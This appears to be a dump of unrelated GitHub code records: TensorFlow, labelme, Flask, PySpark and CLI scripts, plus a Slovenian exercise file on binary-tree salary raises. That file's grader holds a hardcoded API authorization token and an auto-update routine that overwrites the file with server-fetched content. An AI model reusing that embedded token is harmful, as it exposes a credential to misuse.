%.3f\" % (i, j, test_cost, err))\n costs.append(test_cost)\n\n\n\n# In[22]:\n\n\nimport matplotlib.pyplot as plt\n\nplt.plot(costs)\nplt.show()\n# increase max_iter and notice how the test cost starts to increase.\n# are we overfitting by adding that extra layer?\n# how would you add regularization to this model?\n\n","repo_name":"denisb411/neural_network_improved","sub_path":"tensorflow_example.py","file_name":"tensorflow_example.py","file_ext":"py","file_size_in_byte":5467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
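One way to answer the script's closing question about regularization: fold an L2 penalty into the cost using the `reg` constant the script already defines (sketch, same TF1-style API as used above):

# L2-regularized cost; tf.nn.l2_loss(w) computes sum(w**2) / 2
rcost = cost + reg * (tf.nn.l2_loss(W1) + tf.nn.l2_loss(W2) + tf.nn.l2_loss(W3))
train_op = tf.train.RMSPropOptimizer(lr, decay=0.99, momentum=0.9).minimize(rcost)

Biases are conventionally left out of the penalty; including them rarely helps and slightly biases the fit.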
+{"seq_id":"4335384608","text":"\"\"\"\nbrief: covert single json file to single image dataset.\n\nusage:python labelme_json2dataset.py json_file -o output_directory\n\nreference: https://github.com/wkentaro/labelme/blob/main/labelme/cli/json_to_dataset.py\n\"\"\"\n\n# coding=utf-8\n\nimport argparse\nimport base64\nimport json\nimport os\nimport os.path as osp\n\nimport PIL.Image\nimport imgviz\nfrom labelme import utils\nfrom labelme.logger import logger\n\n\ndef get_data_and_image(json_file):\n \"\"\"\n get data and image from json file\n :param json_file: json file\n :return: data and image\n \"\"\"\n with open(json_file, 'rb') as json_f:\n data = json.load(json_f)\n image_data = data.get('imageData')\n if not image_data:\n image_path = os.path.join(os.path.dirname(json_file), data['imagePath'])\n with open(image_path, 'rb') as image_f:\n image_data = image_f.read()\n image_data = base64.b64encode(image_data).decode('utf-8')\n img = utils.img_b64_to_arr(image_data)\n\n return data, img\n\n\ndef get_label_names(data, image):\n \"\"\"\n get label names from data and image\n :param data: data\n :param image: image\n :return: label names and lbl\n \"\"\"\n label_name_to_value = {'_background_': 0}\n for shape in sorted(data['shapes'], key=lambda x: x['label']):\n label_name = shape['label']\n if label_name in label_name_to_value:\n pass\n else:\n label_value = len(label_name_to_value)\n label_name_to_value[label_name] = label_value\n lbl, _ = utils.shapes_to_label(image.shape, data['shapes'], label_name_to_value)\n\n label_names = [None] * (max(label_name_to_value.values()) + 1)\n for name, value in label_name_to_value.items():\n label_names[value] = name\n\n return label_names, lbl\n\n\ndef save_image_and_label(image, lbl, output_dir, label_names):\n \"\"\"\n save image and label to output_dir\n :param image: image\n :param lbl: label\n :param output_dir: output directory\n :param label_names: label names\n :return:\n \"\"\"\n PIL.Image.fromarray(image).save(osp.join(output_dir, 'img.png'))\n utils.lblsave(osp.join(output_dir, 'label.png'), lbl)\n lbl_viz = imgviz.label2rgb(lbl, imgviz.asgray(image), label_names=label_names, loc=\"rb\")\n PIL.Image.fromarray(lbl_viz).save(osp.join(output_dir, 'label_viz.png'))\n\n with open(osp.join(output_dir, 'label_names.txt'), 'w', encoding=\"utf8\") as label_f:\n for lbl_name in label_names:\n label_f.write(lbl_name + '\\n')\n\n print(f\"Saved to: {output_dir}\")\n\n\ndef main():\n \"\"\" main \"\"\"\n logger.warning(\n 'This script is aimed to demonstrate how to convert the'\n 'JSON file to a single image dataset, and not to handle'\n 'multiple JSON files to generate a real-use dataset.'\n )\n logger.warning(\n \"It won't handle multiple JSON files to generate a \"\n \"real-use dataset.\"\n )\n parser = argparse.ArgumentParser()\n parser.add_argument('--json_file')\n parser.add_argument('--output_dir', default=None)\n args = parser.parse_args()\n\n json_file = args.json_file\n\n if args.output_dir is None:\n out_dir = osp.basename(json_file).replace('.', '_')\n out_dir = osp.join(osp.dirname(json_file), out_dir)\n else:\n out_dir = args.output_dir\n if not osp.exists(out_dir):\n os.mkdir(out_dir)\n\n (data, img) = get_data_and_image(json_file)\n\n (label_names, lbl) = get_label_names(data, img)\n\n save_image_and_label(img, lbl, out_dir, label_names)\n\n\nif __name__ == '__main__':\n 
main()\n","repo_name":"veraposeidon/labelme2Datasets","sub_path":"labelme2datasets/labelme_json2dataset.py","file_name":"labelme_json2dataset.py","file_ext":"py","file_size_in_byte":3578,"program_lang":"python","lang":"en","doc_type":"code","stars":168,"dataset":"github-code","pt":"2"}
+{"seq_id":"6321454734","text":"# Fix error which might appear when this script is ran from the command line\n\nimport sys\nimport os\n\nis_running_from_command_line = len(sys.path) <= 7\nif is_running_from_command_line:\n script_path_tokens = sys.path[0].split(os.sep)\n sys.path.extend([os.path.join('/', *script_path_tokens[:-1]),\n os.path.join('/', *script_path_tokens[:-2], 'evoman_framework', 'evoman')])\n\n# Fix evoman resources loading not working because framework assumes the current working directory is\n# always `evoman_framework`\n\n\nif is_running_from_command_line:\n os.chdir('./evoman_framework')\nelse:\n os.chdir('../../evoman_framework')\n\n# Start of code without hacks\n\n\nimport pso_bootstrap.parameters as parameters\n\nfrom pso_bootstrap.evoman_pso.algorithm import EvomanPsoAlgorithm\nfrom pso_bootstrap.evoman_pso.parameters import EvomanPsoParameters\n\nfrom utils.pickle import save_class_instance\n\nif __name__ == '__main__':\n evoman_pso_parameters = EvomanPsoParameters(\n enemies_chosen_for_training=parameters.ENEMIES_CHOSEN_FOR_TRAINING,\n model_hidden_layers_sizes=parameters.MODEL_HIDDEN_LAYERS_SIZES,\n model_min_weight=parameters.MODEL_MIN_WEIGHT,\n model_max_weight=parameters.MODEL_MAX_WEIGHT,\n pop_size=parameters.POP_SIZE,\n nr_iterations=parameters.NR_ITERATIONS,\n inertia_initial_weight=parameters.INERTIA_INITIAL_WEIGHT,\n cognitive_weight=parameters.COGNITIVE_WEIGHT,\n social_weight=parameters.SOCIAL_WEIGHT,\n min_particle_speed=parameters.MIN_PARTICLE_SPEED,\n max_particle_speed=parameters.MAX_PARTICLE_SPEED,\n thread_pool_size=parameters.THREAD_POOL_SIZE\n )\n\n evoman_pso_algorithm = EvomanPsoAlgorithm(evoman_pso_parameters)\n evoman_pso_solution = evoman_pso_algorithm.train()\n\n evoman_pso_parameters.enemies_chosen_for_training.sort()\n pso_bootstrap_trained_models_dir = f'../trained_models/pso_bootstrap/{evoman_pso_parameters.enemies_chosen_for_training}'\n pso_bootstrap_trained_model_name = f'{evoman_pso_solution.model_fitness:.2f}'\n\n save_class_instance(evoman_pso_solution, pso_bootstrap_trained_models_dir, pso_bootstrap_trained_model_name,\n is_with_timestamp=True)\n","repo_name":"gabrielxzc/evoman-game-playing-competition-WCCI-2020","sub_path":"code/pso_bootstrap/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2222,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"16200947710","text":"from flask import Flask , render_template, request, redirect, url_for\nfrom flask_sqlalchemy import SQLAlchemy\n\n\nmyapp = Flask(__name__)\nmyapp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///db.sqlite'\ndb = SQLAlchemy(myapp)\n\nclass flaskDB(db.Model):\n id = db.Column(db.Integer,primary_key = True)\n title = db.Column(db.String(100))\n status = db.Column(db.Boolean)\n \n\n@myapp.route('/')\ndef home():\n incompleted_list = flaskDB.query.filter_by(status=False).all()\n completed_list = flaskDB.query.filter_by(status=True).all()\n return render_template('base.html', incompleted_list=incompleted_list, completed_list=completed_list)\n\n@myapp.route('/add', methods=['POST'])\ndef add_item():\n activity_name = request.form.get('item')\n add_row = flaskDB(title=activity_name, status=False)\n db.session.add(add_row)\n db.session.commit()\n return redirect(url_for('home'))\n\n@myapp.route(\"/complete/\")\ndef complete(todo_id):\n complete_row = flaskDB.query.filter_by(id=todo_id).first()\n complete_row.status = True\n db.session.commit()\n return redirect(url_for('home'))\n\n@myapp.route(\"/delete/\")\ndef delete(todo_id):\n del_row = flaskDB.query.filter_by(id=todo_id).first()\n db.session.delete(del_row)\n db.session.commit()\n return redirect(url_for(\"home\"))\n\n\n\nif __name__ == '__main__':\n db.create_all()\n myapp.run(debug=True)\n","repo_name":"Sreeja1850/MyProject","sub_path":"flask_todo/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"18132746909","text":"# =============================================================================\n# Plače\n#\n# V nekem uspešnem slovenskem podjetju so zaposleni urejeni hierarhično. Vsakdo\n# razen direktorja ima natanko enega nadrejenega. Vsak uslužbenec ima lahko pod\n# seboj največ dva podrejena (levega in desnega). Primer takšne hierarhije (številke\n# so njihove plače):\n# \n# lucka = Drevo(('Lučka', 800), levo=Drevo(('Peter', 900)), desno=Drevo(('Tadeja', 700)))\n# matjaz = Drevo(('Matjaž', 1100), levo=Drevo(('Simona', 700)), desno=Drevo(('Boris', 1000), levo=lucka))\n# branko = Drevo(('Branko', 900), desno=Drevo(('Benjamin', 1100)))\n# ales = Drevo(('Aleš', 1500), levo=matjaz, desno=branko)\n# \n# V tem podjetju imajo zelo močen sindikat. Sindikalisti so ugotovili, da višine\n# plač niso pravične. Nedopustno je, da imajo nekateri podrejeni višje plače od\n# svojih nadrejenih! Zato sindikat zahteva, da mora imeti vsak zaposleni vsaj za\n# 100 € višjo plačo od kateregakoli svojega podrejenega.\n# \n# Direktor bi rad analiziral podatke, preden se spusti v pogajanja s sindikalisti.\n# Podatke o plačah zaposlenih je shranil v dvojiško drevo, v katerem so v\n# vozliščih shranjeni pari z imeni in plačami zaposlenih.\n# =====================================================================@010479=\n# 1. podnaloga\n# Direktorja zanima, koliko dodatnega denarja bi potreboval vsak mesec, če bi\n# ugodil zahtevam sindikata. Želi, da sestavite funkcijo `odprava_krivic(sef)`,\n# ki vrne skupno vsoto denarja, ki bi ga potreboval za odpravo krivic. Primer\n# (če `d` ustreza zgornji sliki):\n# \n# >>> odprava_krivic(d)\n# 700\n# \n# _Komentar:_ Lučka bi po novem prejemala 1000 €, ker dobiva Peter 900 €.\n# Zaradi Lučke bi moral Boris prejemati 1100 €. Zaradi Borisa pa bi moral\n# Matjaž prejemati 1200 €. Branko bi zaradi Benjamina moral prejemati 1200 €.\n# Vsota vseh povišic znaša 700 €.\n# \n# _Komentar 2:_ ne pozabite, da se plače nikomur ne znižajo. Torej če imata podrejena\n# plačo 800 in 900, šef pa 1500 in se recimo zgodi, da bosta podrejena po novem imela\n# plači 850 in 1100, bo šef obdržal plačo 1500 (in ne dobil recimo plačo 1200)\n# =============================================================================\n\n# =====================================================================@010480=\n# 2. podnaloga\n# Direktor bi sindikaliste rad prepričal, da se razburjajo po nepotrebnem.\n# Rad bi imel seznam imen vseh tistih uslužbencev, ki bi prejeli povišice.\n# (Od vseh takih bo namreč pridobil pisne izjave, da so zadovoljni s svojo\n# plačo.) Napišite funkcijo `pisne_izjave(sef)`, ki vrne množico imen vseh\n# zaposlenih, ki bi prejeli povišico. Primer:\n# \n# >>> pisne_izjave(d)\n# {'Lučka', 'Boris', 'Branko', 'Matjaž'}\n# =============================================================================\n\n# =====================================================================@010481=\n# 3. podnaloga\n# Po večtedenskih pogajanjih s sindikatom je imel direktor poln k███ vsega,\n# zato je udaril po mizi! Odločil se je, da bo najprej vsem plače zmanjšal\n# na \"minimalce\", potem pa bo povišal plače na način, ki ga predlaga sindikat.\n# Tako bo volk sit in koza cela. Napišite funkcijo `uravnilovka(sef)`, ki vrne\n# skupno vsoto denarja, ki bi ga na ta način prihranil vsak mesec (glede na\n# trenutne plače). \"Minimalec\" znaša 500 €. 
Primer:\n# \n# >>> uravnilovka(d)\n# 3100\n# =============================================================================\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n# ============================================================================@\n\n'Če vam Python sporoča, da je v tej vrstici sintaktična napaka,'\n'se napaka v resnici skriva v zadnjih vrsticah vaše kode.'\n\n'Kode od tu naprej NE SPREMINJAJTE!'\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nimport io, json, os, re, sys, shutil, traceback, urllib.error, urllib.request\n\n\nfrom contextlib import contextmanager\n\nclass Check:\n @staticmethod\n def has_solution(part):\n return part['solution'].strip() != ''\n\n @staticmethod\n def initialize(parts):\n Check.parts = parts\n for part in Check.parts:\n part['valid'] = True\n part['feedback'] = []\n part['secret'] = []\n Check.current_part = None\n Check.part_counter = None\n\n @staticmethod\n def part():\n if Check.part_counter is None:\n Check.part_counter = 0\n else:\n Check.part_counter += 1\n Check.current_part = Check.parts[Check.part_counter]\n return Check.has_solution(Check.current_part)\n\n @staticmethod\n def feedback(message, *args, **kwargs):\n Check.current_part['feedback'].append(message.format(*args, **kwargs))\n\n @staticmethod\n def error(message, *args, **kwargs):\n Check.current_part['valid'] = False\n Check.feedback(message, *args, **kwargs)\n\n @staticmethod\n def clean(x, digits=6, typed=False):\n t = type(x)\n if t is float:\n x = round(x, digits)\n # Since -0.0 differs from 0.0 even after rounding,\n # we change it to 0.0 abusing the fact it behaves as False.\n v = x if x else 0.0\n elif t is complex:\n v = complex(Check.clean(x.real, digits, typed), Check.clean(x.imag, digits, typed))\n elif t is list:\n v = list([Check.clean(y, digits, typed) for y in x])\n elif t is tuple:\n v = tuple([Check.clean(y, digits, typed) for y in x])\n elif t is dict:\n v = sorted([(Check.clean(k, digits, typed), Check.clean(v, digits, typed)) for (k, v) in x.items()])\n elif t is set:\n v = sorted([Check.clean(y, digits, typed) for y in x])\n else:\n v = x\n return (t, v) if typed else v\n\n @staticmethod\n def secret(x, hint=None, clean=None):\n clean = clean or Check.clean\n Check.current_part['secret'].append((str(clean(x)), hint))\n\n @staticmethod\n def equal(expression, expected_result, clean=None, env={}):\n local_env = locals()\n local_env.update(env)\n clean = clean or Check.clean\n actual_result = eval(expression, globals(), local_env)\n if clean(actual_result) != clean(expected_result):\n Check.error('Izraz {0} vrne {1!r} namesto {2!r}.',\n expression, actual_result, expected_result)\n return False\n else:\n return True\n\n @staticmethod\n def run(statements, expected_state, clean=None, env={}):\n code = \"\\n\".join(statements)\n statements = \" >>> \" + \"\\n >>> \".join(statements)\n s = {}\n s.update(env)\n clean = clean or Check.clean\n exec(code, globals(), s)\n errors = []\n for (x, v) in expected_state.items():\n if x not in s:\n errors.append('morajo nastaviti spremenljivko {0}, vendar je ne'.format(x))\n elif clean(s[x]) != clean(v):\n errors.append('nastavijo {0} na {1!r} namesto na {2!r}'.format(x, s[x], v))\n if errors:\n Check.error('Ukazi\\n{0}\\n{1}.', statements, \";\\n\".join(errors))\n return False\n else:\n return True\n\n 
@staticmethod\n @contextmanager\n def in_file(filename, content, encoding=None):\n with open(filename, 'w', encoding=encoding) as f:\n for line in content:\n print(line, file=f)\n old_feedback = Check.current_part['feedback'][:]\n yield\n new_feedback = Check.current_part['feedback'][len(old_feedback):]\n Check.current_part['feedback'] = old_feedback\n if new_feedback:\n new_feedback = ['\\n '.join(error.split('\\n')) for error in new_feedback]\n Check.error('Pri vhodni datoteki {0} z vsebino\\n {1}\\nso se pojavile naslednje napake:\\n- {2}', filename, '\\n '.join(content), '\\n- '.join(new_feedback))\n\n @staticmethod\n @contextmanager\n def input(content, encoding=None):\n old_stdin = sys.stdin\n old_feedback = Check.current_part['feedback'][:]\n sys.stdin = io.StringIO('\\n'.join(content))\n try:\n yield\n finally:\n sys.stdin = old_stdin\n new_feedback = Check.current_part['feedback'][len(old_feedback):]\n Check.current_part['feedback'] = old_feedback\n if new_feedback:\n new_feedback = ['\\n '.join(error.split('\\n')) for error in new_feedback]\n Check.error('Pri vhodu\\n {0}\\nso se pojavile naslednje napake:\\n- {1}', '\\n '.join(content), '\\n- '.join(new_feedback))\n\n @staticmethod\n def out_file(filename, content, encoding=None):\n with open(filename, encoding=encoding) as f:\n out_lines = f.readlines()\n equal, diff, line_width = Check.difflines(out_lines, content)\n if equal:\n return True\n else:\n Check.error('Izhodna datoteka {0}\\n je enaka{1} namesto:\\n {2}', filename, (line_width - 7) * ' ', '\\n '.join(diff))\n return False\n\n @staticmethod\n def output(expression, content, use_globals=False):\n old_stdout = sys.stdout\n sys.stdout = io.StringIO()\n try:\n def visible_input(prompt):\n inp = input(prompt)\n print(inp)\n return inp\n exec(expression, globals() if use_globals else {'input': visible_input})\n finally:\n output = sys.stdout.getvalue().strip().splitlines()\n sys.stdout = old_stdout\n equal, diff, line_width = Check.difflines(output, content)\n if equal:\n return True\n else:\n Check.error('Program izpiše{0} namesto:\\n {1}', (line_width - 13) * ' ', '\\n '.join(diff))\n return False\n\n @staticmethod\n def difflines(actual_lines, expected_lines):\n actual_len, expected_len = len(actual_lines), len(expected_lines)\n if actual_len < expected_len:\n actual_lines += (expected_len - actual_len) * ['\\n']\n else:\n expected_lines += (actual_len - expected_len) * ['\\n']\n equal = True\n line_width = max(len(actual_line.rstrip()) for actual_line in actual_lines + ['je enaka'])\n diff = []\n for out, given in zip(actual_lines, expected_lines):\n out, given = out.rstrip(), given.rstrip()\n if out != given:\n equal = False\n diff.append('{0} {1} {2}'.format(out.ljust(line_width), '|' if out == given else '*', given))\n return equal, diff, line_width\n\n @staticmethod\n def generator(expression, expected_values, should_stop=False, further_iter=0, env={}, clean=None):\n from types import GeneratorType\n local_env = locals()\n local_env.update(env)\n clean = clean or Check.clean\n gen = eval(expression, globals(), local_env)\n if not isinstance(gen, GeneratorType):\n Check.error(\"Izraz {0} ni generator.\", expression)\n return False\n\n try:\n for iteration, expected_value in enumerate(expected_values):\n actual_value = next(gen)\n if clean(actual_value) != clean(expected_value):\n Check.error(\"Vrednost #{0}, ki jo vrne generator {1} je {2!r} namesto {3!r}.\",\n iteration, expression, actual_value, expected_value)\n return False\n for _ in range(further_iter):\n 
next(gen) # we will not validate it\n except StopIteration:\n Check.error(\"Generator {0} se prehitro izteče.\", expression)\n return False\n \n if should_stop:\n try:\n next(gen)\n Check.error(\"Generator {0} se ne izteče (dovolj zgodaj).\", expression)\n except StopIteration:\n pass # this is fine\n return True\n\n @staticmethod\n def summarize():\n for i, part in enumerate(Check.parts):\n if not Check.has_solution(part):\n print('{0}. podnaloga je brez rešitve.'.format(i + 1))\n elif not part['valid']:\n print('{0}. podnaloga nima veljavne rešitve.'.format(i + 1))\n else:\n print('{0}. podnaloga ima veljavno rešitev.'.format(i + 1))\n for message in part['feedback']:\n print(' - {0}'.format('\\n '.join(message.splitlines())))\n\n\ndef _validate_current_file():\n def extract_parts(filename):\n with open(filename, encoding='utf-8') as f:\n source = f.read()\n part_regex = re.compile(\n r'# =+@(?P\\d+)=\\n' # beginning of header\n r'(#( [^\\n]*)?\\n)+' # description\n r'# =+\\n' # end of header\n r'(?P.*?)' # solution\n r'(?=\\n# =+@)', # beginning of next part\n flags=re.DOTALL | re.MULTILINE\n )\n parts = [{\n 'part': int(match.group('part')),\n 'solution': match.group('solution')\n } for match in part_regex.finditer(source)]\n # The last solution extends all the way to the validation code,\n # so we strip any trailing whitespace from it.\n parts[-1]['solution'] = parts[-1]['solution'].rstrip()\n return parts\n\n def backup(filename):\n backup_filename = None\n suffix = 1\n while not backup_filename or os.path.exists(backup_filename):\n backup_filename = '{0}.{1}'.format(filename, suffix)\n suffix += 1\n shutil.copy(filename, backup_filename)\n return backup_filename\n\n def submit_parts(parts, url, token):\n submitted_parts = []\n for part in parts:\n if Check.has_solution(part):\n submitted_part = {\n 'part': part['part'],\n 'solution': part['solution'],\n 'valid': part['valid'],\n 'secret': [x for (x, _) in part['secret']],\n 'feedback': json.dumps(part['feedback']),\n }\n if 'token' in part:\n submitted_part['token'] = part['token']\n submitted_parts.append(submitted_part)\n data = json.dumps(submitted_parts).encode('utf-8')\n headers = {\n 'Authorization': token,\n 'content-type': 'application/json'\n }\n request = urllib.request.Request(url, data=data, headers=headers)\n response = urllib.request.urlopen(request)\n return json.loads(response.read().decode('utf-8'))\n\n def update_attempts(old_parts, response):\n updates = {}\n for part in response['attempts']:\n part['feedback'] = json.loads(part['feedback'])\n updates[part['part']] = part\n for part in old_parts:\n valid_before = part['valid']\n part.update(updates.get(part['part'], {}))\n valid_after = part['valid']\n if valid_before and not valid_after:\n wrong_index = response['wrong_indices'].get(str(part['part']))\n if wrong_index is not None:\n hint = part['secret'][wrong_index][1]\n if hint:\n part['feedback'].append('Namig: {}'.format(hint))\n\n\n filename = os.path.abspath(sys.argv[0])\n file_parts = extract_parts(filename)\n Check.initialize(file_parts)\n\n if Check.part():\n \n try:\n lucka = Drevo(('Lučka', 800), levo=Drevo(('Peter', 900)), desno=Drevo(('Tadeja', 700)))\n matjaz = Drevo(('Matjaž', 1100), levo=Drevo(('Simona', 700)), desno=Drevo(('Boris', 1000), levo=lucka))\n branko = Drevo(('Branko', 900), desno=Drevo(('Benjamin', 1100)))\n ales = Drevo(('Aleš', 1500), levo=matjaz, desno=branko)\n Check.equal(\"\"\"odprava_krivic(ales)\"\"\", 700, env = {\"ales\": ales})\n except:\n Check.error(\"Testi sprožijo 
izjemo\\n {0}\",\n \"\\n \".join(traceback.format_exc().split(\"\\n\"))[:-2])\n\n if Check.part():\n \n try:\n lucka = Drevo(('Lučka', 800), levo=Drevo(('Peter', 900)), desno=Drevo(('Tadeja', 700)))\n matjaz = Drevo(('Matjaž', 1100), levo=Drevo(('Simona', 700)), desno=Drevo(('Boris', 1000), levo=lucka))\n branko = Drevo(('Branko', 900), desno=Drevo(('Benjamin', 1100)))\n ales = Drevo(('Aleš', 1500), levo=matjaz, desno=branko)\n Check.equal(\"\"\"pisne_izjave(ales)\"\"\", {'Lučka', 'Boris', 'Branko', 'Matjaž'}, env = {\"ales\": ales})\n except:\n Check.error(\"Testi sprožijo izjemo\\n {0}\",\n \"\\n \".join(traceback.format_exc().split(\"\\n\"))[:-2])\n\n if Check.part():\n \n try:\n lucka = Drevo(('Lučka', 800), levo=Drevo(('Peter', 900)), desno=Drevo(('Tadeja', 700)))\n matjaz = Drevo(('Matjaž', 1100), levo=Drevo(('Simona', 700)), desno=Drevo(('Boris', 1000), levo=lucka))\n branko = Drevo(('Branko', 900), desno=Drevo(('Benjamin', 1100)))\n ales = Drevo(('Aleš', 1500), levo=matjaz, desno=branko)\n Check.equal(\"\"\"uravnilovka(ales)\"\"\", 3100, env = {\"ales\": ales})\n except:\n Check.error(\"Testi sprožijo izjemo\\n {0}\",\n \"\\n \".join(traceback.format_exc().split(\"\\n\"))[:-2])\n\n print('Shranjujem rešitve na strežnik... ', end=\"\")\n try:\n url = 'https://www.projekt-tomo.si/api/attempts/submit/'\n token = 'Token a7d3422f9635f98a67f097384251c60b342d336e'\n response = submit_parts(Check.parts, url, token)\n except urllib.error.URLError:\n print('PRI SHRANJEVANJU JE PRIŠLO DO NAPAKE! Poskusite znova.')\n else:\n print('Rešitve so shranjene.')\n update_attempts(Check.parts, response)\n if 'update' in response:\n print(\"Posodabljam datoteko... \", end=\"\")\n backup_filename = backup(filename)\n r = urlopen(response['update'])\n with open(filename, 'w', encoding='utf-8') as f:\n f.write(r.read().decode('utf-8'))\n print(\"Stara datoteka je preimenovana v {0}.\".format(os.path.basename(backup_filename)))\n print(\"Če se datoteka v urejevalniku ni osvežila, jo zaprite ter ponovno odprite.\")\n Check.summarize()\n\nif __name__ == '__main__':\n _validate_current_file()\n","repo_name":"jakobvalic/RAC-1","sub_path":"7-uporaba-dvojiskih-dreves/place.py","file_name":"place.py","file_ext":"py","file_size_in_byte":18516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
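The record above ships with all three solution slots empty. A sketch of one possible solution to the first subtask, assuming the course's usual Drevo binary-tree class (with prazno, vrednost, levo and desno attributes); on the example tree it returns 700, matching the worked commentary in the problem text:

def odprava_krivic(sef):
    # returns (new_salary_of_root, total_raise_in_subtree)
    def popravi(drevo):
        if drevo.prazno:
            return 0, 0
        _, placa = drevo.vrednost
        leva_placa, leva_vsota = popravi(drevo.levo)
        desna_placa, desna_vsota = popravi(drevo.desno)
        zahteva = max(leva_placa, desna_placa)
        # at least 100 above the best-paid subordinate, but never a pay cut
        nova_placa = max(placa, zahteva + 100) if zahteva else placa
        return nova_placa, leva_vsota + desna_vsota + (nova_placa - placa)
    return popravi(sef)[1]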
+{"seq_id":"11544038455","text":"# 행에서 카드를 한장 뽑을 때, 행에서는 가장 작은 수지만, 가장 작은 수 중 큰수 뽑기\n\n\"\"\"\n정렬로만으로 풀 수 있을 것 같음\n2차원 배열을 각각 정렬\n\n\"\"\"\n\n#n, m = map(int, input().split())\n\ndef sol(n,m, cards):\n sorted_list = []\n for list in cards:\n sorted_list.append(sorted(list))\n sorted_list.sort(key=lambda x: x[0])\n return sorted_list[-1][0]\n\n# 예시를 본 후 개선\ndef sol2(n,m, cards):\n result = 0\n for list in cards:\n min_value = min(list)\n result = max(result, min_value)\n return result\n\n\nmetrix = [[3,1,2], [4,1,4,], [2,2,2]]\nprint(sol(3,3, metrix))\n\nmetrix = [[7,3,1,8], [3,3,3,4]]\nprint(sol2(2,4, metrix))\n\n\n# 예시 1\nn,m = map(int, input().split())\nresult = 0\n\nfor i in range(n):\n data = list(map(int, input().split()))\n min_value = min(data)\n result = max(result, min_value)\n\nprint(result)\n\n\n","repo_name":"hryeong66/Algorithm","sub_path":"이것이코딩테스트/greedy/숫자_카드_게임.py","file_name":"숫자_카드_게임.py","file_ext":"py","file_size_in_byte":911,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"}
+{"seq_id":"39964353817","text":"from pyspark import SparkConf\nfrom pyspark.sql import SparkSession\nfrom pyspark.sql.functions import *\n\nmyconf = SparkConf()\nmyconf.set(\"spark.app.name\", \"group_Aggregation\")\nmyconf.set(\"spark.master\", \"local[*]\")\n\nspark = SparkSession.builder.config(conf=myconf).getOrCreate()\n\ninvoiceDF = spark.read.format(\"csv\")\\\n .option(\"inferSchema\", True)\\\n .option(\"header\", True)\\\n .option(\"path\", \"C:\\\\Users\\\\hp\\\\Desktop\\\\week12\\\\order_data.csv\")\\\n .load()\n\n# column object expression\nresultDF = invoiceDF.groupBy(\"Country\", \"InvoiceNo\")\\\n .agg(sum(\"Quantity\").alias(\"TotalQuantity\"),\n sum(expr(\"Quantity * UnitPrice\")).alias(\"InvoiceValue\"))\nresultDF.show()\n\n# column string expression\nresultDF = invoiceDF.groupBy(\"Country\", \"InvoiceNo\")\\\n .agg(expr(\"sum(Quantity) as TotalQuantity\"),\nexpr(\"sum(Quantity * UnitPrice) as InvoiceValue\"))\nresultDF.show()\n\n# spark SQL\ninvoiceDF.createOrReplaceTempView(\"sales\")\nspark.sql(\"\"\" select country, InvoiceNo, sum(Quantity) as totQty, sum(Quantity * UnitPrice)\nas InvoiceValue from sales group by country, InvoiceNo\"\"\").show()\n","repo_name":"anjalinc10/pyspark-dataframe-exercises","sub_path":"group_Aggregation.py","file_name":"group_Aggregation.py","file_ext":"py","file_size_in_byte":1088,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"714935045","text":"def paper(x):\n if x == n:\n return 1\n if x > n:\n return 0\n return paper(x+10) + paper(x+20) * 2\n\nT = int(input())\nanswer = []\nfor tc in range(1, T + 1):\n n = int(input())\n answer.append('#%d %d\\n' %(tc, paper(0)))\nprint(''.join(answer))\n\n'''\n# 시간제한 걸린 코드\ndef paper(i, n):\n if i == n:\n global cnt\n cnt += 1\n else:\n if n - i == 10:\n paper(i+10, n)\n else:\n paper(i+10, n)\n paper(i+20, n)\n paper(i+20, n)\nT = int(input())\nanswer = []\nfor tc in range(1, T+1):\n n = int(input())\n cnt = 0\n paper(0,n)\n answer.append('#%d %d\\n' %(tc, cnt))\nprint(''.join(answer))\n'''","repo_name":"woo3gyeob/algorithm_swea","sub_path":"0223/4869.종이붙이기.py","file_name":"4869.종이붙이기.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"31617910768","text":"from argparse import ArgumentParser, RawDescriptionHelpFormatter\nfrom pathlib import Path\nimport typing as t\n\nfrom git.repo import Repo\nfrom tqdm import tqdm\n\nfrom gitout._data import VERSION\nfrom gitout.util import confirm\nfrom gitout.path import Filter\nfrom .walker import Walker\n\nPROGNAME = \"gitout-update\"\nDESCRIPTION = \"Update all bare repositories in a directory with git fetch.\"\nEPILOG = \"\"\n\ndef make_parser() -> ArgumentParser:\n cli = ArgumentParser(\n description=DESCRIPTION,\n epilog=EPILOG,\n formatter_class=RawDescriptionHelpFormatter\n )\n cli.add_argument(\"--version\", action=\"version\", version=f\"{PROGNAME} {VERSION}\")\n cli.add_argument(\n \"directories\",\n action=\"append\",\n nargs=\"*\",\n type=Path,\n help=\"Directories where the repositories are stored.\"\n )\n cli.add_argument(\n \"-r\",\n \"--recursive\",\n action=\"count\",\n default=0,\n help=\"Search for repositories in recursively. \\\nIf -r is passed, gitout-update assumes that a directory that is a git \\\nrepository will not contain repository mirrors in any of its subdirectories. \\\nIf -rr is passed, gitout-update will git fetch all repositories, even if they \\\nare inside another repo.\"\n )\n cli.add_argument(\n \"-i\",\n \"--include\",\n action=\"append\",\n default=[],\n help=\"List of regex patterns to determine which absolute paths should be fetched. \\\nAll repos are included by default (i.e. r'.*' implied).\"\n )\n cli.add_argument(\n \"-e\",\n \"--exclude\",\n action=\"append\",\n default=[],\n help=\"List of regex patterns 